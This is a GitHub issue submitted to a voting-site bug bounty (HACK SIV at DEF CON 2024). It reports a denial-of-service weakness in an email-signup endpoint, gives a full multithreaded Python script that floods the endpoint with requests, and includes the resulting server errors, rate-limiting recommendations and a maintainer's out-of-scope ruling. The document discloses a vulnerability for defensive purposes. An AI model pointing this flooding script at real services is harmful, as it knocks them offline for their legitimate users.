Potential Denial of Service (DoS) Vulnerability Due to High Volume of Requests

[cjackett]

Issue Description

Note: This issue is a refinement of https://github.com/siv-org/siv/issues/193, separating concerns related to CORS and focusing on a potential DoS attack vector.

During recent local testing, it was discovered that the email-signup endpoint (/api/email-signup) is vulnerable to resource abuse attacks, which could result in a denial of service (DoS). A stress test involving a large number of concurrent requests to this endpoint caused significant strain on the server, leading to eventual failure.

Exploitation Script

The following Python script was used to simulate a DoS attack by sending multiple concurrent requests to the email-signup endpoint:

import requests
import threading
import time
import os

# Target URL
url = "http://localhost:3000/api/email-signup"

# Payload data to send in the POST request
data = {
    "email": "test@example.com"
}

# Number of CPU cores on the machine
num_threads = os.cpu_count()

# Number of requests per thread
requests_per_thread = 10000000

def send_request():
    for _ in range(requests_per_thread):
        try:
            response = requests.post(url, json=data)
            print(f"Response status code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")

def main():
    threads = []

    print(f"Starting {num_threads} threads...")

    # Start the threads
    for _ in range(num_threads):
        thread = threading.Thread(target=send_request)
        thread.start()
        threads.append(thread)
        time.sleep(0.1)  # Slight delay to simulate staggered requests

    # Wait for all threads to complete
    for thread in threads:
        thread.join()

if __name__ == "__main__":
    main()

Testing Results

The script successfully sent a high volume of requests to the email-signup endpoint, resulting in substantial server load. The development server issued a MaxListenersExceededWarning, indicating possible memory leaks due to the excessive number of concurrent requests:

(node:9431) MaxListenersExceededWarning: Possible EventEmitter memory leak detected. 11 server/api/email-signup listeners added to [EventEmitter]. MaxListeners is 10. Use emitter.setMaxListeners() to increase limit

Although the SIV website remained partially responsive, intermittent slowdowns were observed. Eventually, the backend began generating HTTP 500 errors, signaling its inability to handle the excessive request load:

error - GoogleError: Total timeout of API google.firestore.v1.Firestore exceeded 600000 milliseconds before any response was received.

Mitigation

While the production SIV system implements rate limiting as a countermeasure against such attacks, no rate limiting code was found in the current codebase.

Recommendations:

1. Verify Rate Limiting: Ensure that rate limiting is active and properly configured for all critical endpoints, including email-signup.

2. Stress Testing: Conduct regular stress testing on the production environment to ensure that it can withstand high volumes of traffic without degrading performance or becoming unavailable.

3. EventEmitter Configuration: Review and adjust the MaxListeners setting or refactor the code to prevent memory leaks under high load conditions.

[arianabuilds]

Entry Summary for HACK SIV @ DEF CON 2024

Thanks again for participating! This submission earned $0.00 from SIV and $107.29 from the Public Vote, for a total of $107.29.

Here's what we noted in our evaluation:

What takes away from it

• Out-of-Scope for HACK SIV @ DEFCON '24

Issue to track getting paid: https://github.com/siv-org/hack.siv.org/issues/10